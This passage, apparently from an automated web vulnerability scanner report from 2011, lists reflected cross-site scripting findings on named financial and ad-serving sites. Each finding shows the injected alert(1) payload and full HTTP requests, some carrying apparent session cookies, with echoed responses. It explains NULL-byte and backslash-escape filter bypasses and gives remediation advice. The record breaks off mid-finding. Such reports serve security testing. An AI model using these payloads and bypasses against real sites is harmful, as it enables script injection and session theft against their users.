Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id
...[SNIP]...
dhie9nf_la5jf8hgq_obozt2dpixaocaxv4iptb_9k5owvk4oeedpgoimlc1o-lxbw02k-6_zeqw8ys0f530jj6slyh_ik5vqbhk__q08jxopyjlxcqqkiiggwkbcyv4k87_y342hlj1e6adsytayz1jilxb7nc-htbw9kc1ekzyihazoah1aigpm7crwvod8dkwn0%0073e86'-alert(1)-'4780651d704&t=2ebd21', "System.FormatException: Invalid character in a Base-64 string.
at System.Convert.FromBase64CharArray(Char[] inArray, Int32 offset, Int32 length)
at System.Web.HttpServerUtility.Url
...[SNIP]...

1.373. http://www.pbig.ml.com/PWA/ScriptResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pbig.ml.com
Path:   /PWA/ScriptResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a4c96'-alert(1)-'ca686a9a990 was submitted in the d parameter. This input was echoed as a4c96'-alert(1)-'ca686a9a990 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /PWA/ScriptResource.axd?d=UeC9qRxMqizc5pPELE8Eud7samwng-n_kYx3CE-mevT7hNEjxIYJIsRTlb8QQvCkKyyrreHSoKSLkGov4ppGCcpboqYhZmerWDZlFMyiOgxw23CzcLcCk7QMch2GZE6tKoEBH42eR4MFqBa2TywhTpN4Vo7dsOLL0dNPbr_sfJ0OvkoT0%00a4c96'-alert(1)-'ca686a9a990&t=20058f12 HTTP/1.1
Host: www.pbig.ml.com
Proxy-Connection: keep-alive
Referer: http://www.pbig.ml.com/pwa/pages/Home.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Bear=oAnF+eDeY70WHZt6WY6KQBvBjWyJeRx7FX770s2gYws=; SMIDENTITY=m9/4aaB52zA0Nk8WZd4qJA4qVRcYojexExOavDRBP2Plx1WJTYyg9X3uzTOSLX1U6DPHSN2frqPUQ5/DMHflsa9dWuH/LPDcqxJgIFz5UcaILx/ymTxKcvXv6TOZK5Wg1yaMbvLix475tWKjsfnT4HrrJKTSlJvBSOzLmTT8JOnaNOj08WUwNipUiJlviXrdr4NrwKAU+EIuE9ypWZSdogivLU3zYIlX7CfBvYrF4K90Q1Fp2DJ+8klFyoWyplao5BiOazOl77Z14Xye6x6upI24mKFvVVMV9Me+hYlgXqR7PhB/dFKoaLTubyBSghi9Vc/BFVY3nOxS6bvKtYWnjnc513xKq/cR+Ijy5zf1Ur5Dimq1E8zylnUk6bBGNx7wqPJ4geDL0K38Ae1fbOgTxrbErQMa/X4r+o6jh54+5KNJamoYxyTZK4yufSyvoU2wiTAU0zfg3h/m6kZ5FQmY4TCMo6fpM+XwwJJoWUXvsGiZ9/mztDEe2dkpnhOB6wWRJxbbC1jadJ65dsbBDXCfcdrC8wMs/Wk4q6kYYY6+iYqT5XYT092tjct2StgeaJiF9EfZE+zhr4VXFrCyzmZy7jLq8w6NQkujZi4GkfBm7A6qkKYVYhB/Pf4HThgo2iTnamNkZjWKzvtqyej+fNN36XKWBVrEtuRa; PBIG_PUID=6940f839-cfc1-49a8-b700-3c5bbc1aa4b3; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Date: Wed, 29 Jun 2011 11:57:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19021


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
scriptresource.axd?d=uec9qrxmqizc5ppele8eud7samwng-n_kyx3ce-mevt7hnejxiyjisrtlb8qqvckkyyrrehsokslkgov4ppgccpboqyhzmerwdzlfmyiogxw23czclcck7qmch2gze6tkoebh42er4mfqba2tywhtpn4vo7dsoll0dnpbr_sfj0ovkot0%00a4c96'-alert(1)-'ca686a9a990&t=20058f12',"Invalid character in a Base-64 string.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace");</script>
...[SNIP]...

1.374. http://www.pbig.ml.com/pwa/pages/find-a-pwa.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pbig.ml.com
Path:   /pwa/pages/find-a-pwa.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40b3e"style%3d"x%3aexpression(alert(1))"c87c81989ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 40b3e"style="x:expression(alert(1))"c87c81989ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pwa/pages/find-a-pwa.aspx?40b3e"style%3d"x%3aexpression(alert(1))"c87c81989ce=1 HTTP/1.1
Host: www.pbig.ml.com
Proxy-Connection: keep-alive
Referer: http://www.pbig.ml.com/PWA/ScriptResource.axd?d=UeC9qRxMqizc5pPELE8Eud7samwng-n_kYx3CE-mevT7hNEjxIYJIsRTlb8QQvCkKyyrreHSoKSLkGov4ppGCcpboqYhZmerWDZlFMyiOgxw23CzcLcCk7QMch2GZE6tKoEBH42eR4MFqBa2TywhTpN4Vo7dsOLL0dNPbr_sfJ0OvkoT0%00a4c96'-alert(document.location)-'ca686a9a990&t=20058f12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Bear=oAnF+eDeY70WHZt6WY6KQBvBjWyJeRx7FX770s2gYws=; SMIDENTITY=m9/4aaB52zA0Nk8WZd4qJA4qVRcYojexExOavDRBP2Plx1WJTYyg9X3uzTOSLX1U6DPHSN2frqPUQ5/DMHflsa9dWuH/LPDcqxJgIFz5UcaILx/ymTxKcvXv6TOZK5Wg1yaMbvLix475tWKjsfnT4HrrJKTSlJvBSOzLmTT8JOnaNOj08WUwNipUiJlviXrdr4NrwKAU+EIuE9ypWZSdogivLU3zYIlX7CfBvYrF4K90Q1Fp2DJ+8klFyoWyplao5BiOazOl77Z14Xye6x6upI24mKFvVVMV9Me+hYlgXqR7PhB/dFKoaLTubyBSghi9Vc/BFVY3nOxS6bvKtYWnjnc513xKq/cR+Ijy5zf1Ur5Dimq1E8zylnUk6bBGNx7wqPJ4geDL0K38Ae1fbOgTxrbErQMa/X4r+o6jh54+5KNJamoYxyTZK4yufSyvoU2wiTAU0zfg3h/m6kZ5FQmY4TCMo6fpM+XwwJJoWUXvsGiZ9/mztDEe2dkpnhOB6wWRJxbbC1jadJ65dsbBDXCfcdrC8wMs/Wk4q6kYYY6+iYqT5XYT092tjct2StgeaJiF9EfZE+zhr4VXFrCyzmZy7jLq8w6NQkujZi4GkfBm7A6qkKYVYhB/Pf4HThgo2iTnamNkZjWKzvtqyej+fNN36XKWBVrEtuRa; PBIG_PUID=6940f839-cfc1-49a8-b700-3c5bbc1aa4b3; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Date: Wed, 29 Jun 2011 12:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 27303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?40b3e"style="x:expression(alert(1))"c87c81989ce=1&k=" id="ctl00_ECMSSearchTextMaster_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextMaster_srcText','ctl00_ECMSSearchTextMaster_srchAnchor1')">
...[SNIP]...

1.375. http://www.totalmerrill.com/TotalMerrill/system/FABranchLocator.aspx [fatype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.totalmerrill.com
Path:   /TotalMerrill/system/FABranchLocator.aspx

Issue detail

The value of the fatype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a9af9'%3balert(1)//435cb9048ee was submitted in the fatype parameter. This input was echoed as a9af9';alert(1)//435cb9048ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /TotalMerrill/system/FABranchLocator.aspx?ddwnSearchType=FA&fatype=wm%00a9af9'%3balert(1)//435cb9048ee HTTP/1.1
Host: www.totalmerrill.com
Proxy-Connection: keep-alive
Referer: http://www.totalmerrill.com/TotalMerrill/system/ContactMLFindBranchOrFAModal.aspx?modal=findBranch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=PIhI4cStJoDsGo2scTmFc7XH5xJA2Xe9hD/vJgvZMNrUoZ2M+cCXcnUXidRv5jOjPKyZumAJlIwKeWIvfrg5h8ldiUJtxJ2TLKvQzj7qS7Du6C7CxAA34sfRG0lP0mpTiDNMz0QWEIher5UfM2JpbEdlHiZgk2L+NFb2qkBBDE2DPGNxX+p/75xFnbmbNhLQQC2uZlhPGc9+R8ZoRyCiAEqeiuq/jvNKRvvDMmRL6/13zinoJI2X6lGL3qUEIYO7wkh9IsK3+RQ53UvvpDnyJjjf6C4oEO1mPrutz9uSRs7tK61QspCb3wkchvtQ+BEnTXd7odpMXW8YgTA4DprpSUns7H/5Ekp9ti0Bl3CdBNaqdXJ9+9pbpSefotOnG1QKgbxEv4RGJy9Q5FqNwkDnYGem3WBm0jZOu8dTl5Mxq/n1uDmQsnixl4XRGckR9M2Jv2alUwpSZ/B/LfJc1yob6AQQBTv/hDtNHFFQJ7AHcMPt+4iQz56ydq184P2j/Y0UliL2PZwX5ehZgBIsbFbclM9lOxkn+CCVfdHMUJZ4mJaHFxhMq5l6rR0MkU1JSmj1c0Zlt9XkBfg5LUSvlSByfSLrSUnHLNn4MI7bXLvKN9+kRzi2RFpZngQFtHjQv7rH+H04NjufBOaq5GTiBNGLqoXpo/3aPzcJ; TM_PUID=e45b9a76-ad58-4f94-8b09-13aeda1b78cf

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12407
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 29 Jun 2011 11:56:16 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<script type='text/javascript'>
FAType = 'WM.A9AF9';ALERT(1)//435CB9048EE'</script>
...[SNIP]...

1.376. http://www.tumri.net/ads/mti/6565 [DFA_AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the DFA_AdId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa8b9\"%3balert(1)//188c68b9106 was submitted in the DFA_AdId parameter. This input was echoed as fa8b9\\";alert(1)//188c68b9106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6565?sc=y&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302fa8b9\"%3balert(1)//188c68b9106&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:10:17 GMT
Expires: Tue Jun 28 02:10:18 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:10:18 GMT; Path=/
Content-Length: 16207
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
rID":"3049","AdvertiserName":"ALLSTATE","ExperienceID":"4629","ExperienceName":"300x250_Myth_Q1","PublisherID":"ALLSTATE","ExternalBuyID":"5366545","ExternalPageID":"61840000","ExternalAdID":"238933302fa8b9\\";alert(1)//188c68b9106","ExternalCreativeID":"41496877","ExternalSiteID":"1073076","CA4":"0","CA3":"1","CA2":"0","CA1":"0","DG1":"05672","DG2":"523","DG3":"stowe","DG4":"vt","DG5":"usa","DG6":"802","TimeZone":"US/Eastern","
...[SNIP]...

1.377. http://www.tumri.net/ads/mti/6565 [DFA_BuyId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the DFA_BuyId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94670\"%3balert(1)//fbe811457b7 was submitted in the DFA_BuyId parameter. This input was echoed as 94670\\";alert(1)//fbe811457b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6565?sc=y&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=536654594670\"%3balert(1)//fbe811457b7&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:09:05 GMT
Expires: Tue Jun 28 02:09:06 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:09:06 GMT; Path=/
Content-Length: 16215
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
":"109598","LocationName":"AllState_Myth_MR","AdvertiserID":"3049","AdvertiserName":"ALLSTATE","ExperienceID":"4629","ExperienceName":"300x250_Myth_Q1","PublisherID":"ALLSTATE","ExternalBuyID":"536654594670\\";alert(1)//fbe811457b7","ExternalPageID":"61840000","ExternalAdID":"238933302","ExternalCreativeID":"41496877","ExternalSiteID":"1073076","CA4":"1","CA3":"0","CA2":"0","CA1":"2","DG1":"05672","DG2":"523","DG3":"stowe","DG4"
...[SNIP]...

1.378. http://www.tumri.net/ads/mti/6565 [DFA_Click_Tracker parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the DFA_Click_Tracker request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95de4\"%3balert(1)//9e7434b3c52 was submitted in the DFA_Click_Tracker parameter. This input was echoed as 95de4\\";alert(1)//9e7434b3c52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6565?sc=y&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D95de4\"%3balert(1)//9e7434b3c52&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:08:33 GMT
Expires: Tue Jun 28 02:08:34 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:08:34 GMT; Path=/
Content-Length: 16196
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
74528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=95de4\\";alert(1)//9e7434b3c52^(lp_url)","Provider":"ALLSTATE","MerchantID":"ALLSTATE","x2_tracking_code_1":"quote=PQ&cid=BAC-Xplus1&att=61840000;41496877&TFN=8664972899&Campaign=222230000010575","source":"y","PublisherID":"ALLSTAT
...[SNIP]...

1.379. http://www.tumri.net/ads/mti/6565 [DFA_CreativeId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the DFA_CreativeId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39856\"%3balert(1)//82fc139c735 was submitted in the DFA_CreativeId parameter. This input was echoed as 39856\\";alert(1)//82fc139c735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

